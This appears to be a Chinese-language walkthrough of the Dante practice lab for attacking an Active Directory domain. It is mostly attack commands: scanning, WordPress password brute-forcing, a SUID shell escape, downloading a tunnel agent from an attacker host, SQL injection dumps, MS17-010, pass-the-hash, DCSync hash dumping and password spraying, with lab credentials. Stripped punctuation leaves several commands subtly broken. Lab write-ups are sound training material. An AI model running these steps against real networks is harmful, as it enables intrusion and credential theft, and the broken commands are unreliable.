AD域内网渗透实战：从Dante靶机到多网段横向移动

1. AD域渗透实战入门从Dante靶机开始AD域渗透是红队演练中的核心技能之一。Dante靶机作为一个典型的AD域环境完美模拟了企业内网的多层网络架构。我们先从基础扫描开始nmap -sn 10.10.110.0/24这个简单的命令就能发现目标网段中的存活主机。当发现100主机在线后我们需要进行更详细的扫描nmap -sC -sV -T4 -p- -n 10.10.110.100扫描结果显示有三个关键端口开放21/tcp FTP允许匿名登录22/tcp SSH65000/tcp HTTP运行Apache服务FTP匿名登录往往是渗透测试的第一个突破口。尝试连接时会发现一个有趣的现象PASV模式返回的IP172.16.1.100与目标IP10.10.110.100不一致这暗示着目标机器可能配置了多网卡或多网络接口。2. Web应用漏洞挖掘与利用在HTTP服务的65000端口通过目录扫描可以发现WordPress安装目录dirsearch -u http://10.10.110.100:65000 -w /usr/share/seclists/Discovery/Web-Content/common.txt或者直接查看robots.txt文件往往能发现开发者不希望被索引的敏感目录。对于WordPress站点wpscan是必备工具wpscan --url http://10.10.110.100:65000/wordpress/ -e p,t,u --plugins-detection aggressive -t 20扫描结果可能会暴露以下关键信息用户枚举如james和admin用户配置文件备份wp-config.php.swp可写上传目录密码破解技巧当常规字典无效时可以使用cewl根据目标网站内容生成定制字典cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks/ pass.txt wpscan --url http://10.10.110.100:65000/wordpress/ --passwords ./pass.txt --usernames james3. 初始立足与权限提升获取Webshell后我们需要进行更深入的权限提升。在Linux系统中常见的提权方法包括SUID提权find / -perm -4000 2/dev/null /usr/bin/find . -exec /bin/sh -p \; -quit数据库凭证利用 通过之前发现的MySQL凭证shaun:password可以尝试连接数据库并枚举更多信息mysql -h 127.0.0.1 -u shaun -p切换用户 使用破解的密码尝试切换用户su james 密码Toyota4. 内网横向移动技术获得初始立足点后内网横向移动是关键。Ligolo-ng是一个强大的隧道工具使用流程如下Kali端启动代理./proxy -selfcert目标机上传并运行agentwget http://10.10.14.2/agent_amd64_linux ./agent_amd64_linux -connect 10.10.14.2:11601 -ignore-cert创建隧道并扫描内网interface_create --name e1 interface_add_route --name e1 --route 172.16.1.0/24 tunnel_start --tun e1使用fscan快速扫描内网存活主机./fscan_arm64 -h 172.16.1.0/24 -skip -p main5. 多网段渗透实战当发现172.16.1.12存在SQL注入漏洞时sqlmap是首选工具sqlmap -u http://172.16.1.12/blog/category.php?id1 --dbs --batch sqlmap -u http://172.16.1.12/blog/category.php?id1 -D flag --batch -T flag --dump对于Windows系统常见的利用方式包括MS17-010漏洞利用use exploit/windows/smb/ms17_010_psexec密码哈希传递攻击impacket-psexec -hashes :14a71f9e65448d83e8c63d46355837c3 katwamba172.16.1.20BloodHound域环境分析bloodhound-python --dns-tcp -ns 172.16.1.20 -d DANTE.local -u mrb3n -p password123! -c All --zip -v6. 权限维持与最终控制在获得域管理员权限后DCSync攻击可以获取所有域用户的哈希impacket-secretsdump -just-dc-ntlm DANTE.ADMIN/jbercov172.16.2.5对于Windows系统的权限维持常见方法包括创建隐藏计划任务注册表自启动项黄金票据攻击提权技巧当遇到受限Shell时可以通过以下方式绕过set shell/bin/sh|:shell对于Linux系统的磁盘组提权debugfs /dev/sda57. 渗透测试中的实用技巧密码喷洒攻击nxc smb 172.16.1.0/24 -u users.txt -p Password123! --continue-on-success服务漏洞快速检测nmap -PN --script smb-vuln* -p139,445 172.16.1.20Windows提权检查whoami /priv Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinueLinux提权检查./linpeas.sh find / -perm -4000 2/dev/null sudo -l在实际渗透测试中保持有条理的记录非常重要。建议详细记录每个步骤和结果及时整理获得的凭证和哈希绘制网络拓扑图标记已攻破的主机和待攻击目标从Dante靶机的渗透过程可以看出AD域环境的安全防护需要多层次、全方位的措施。不仅需要关注外部攻击面更要重视内网横向移动的防护。定期进行红队演练及时发现和修复安全漏洞才是保障企业网络安全的关键。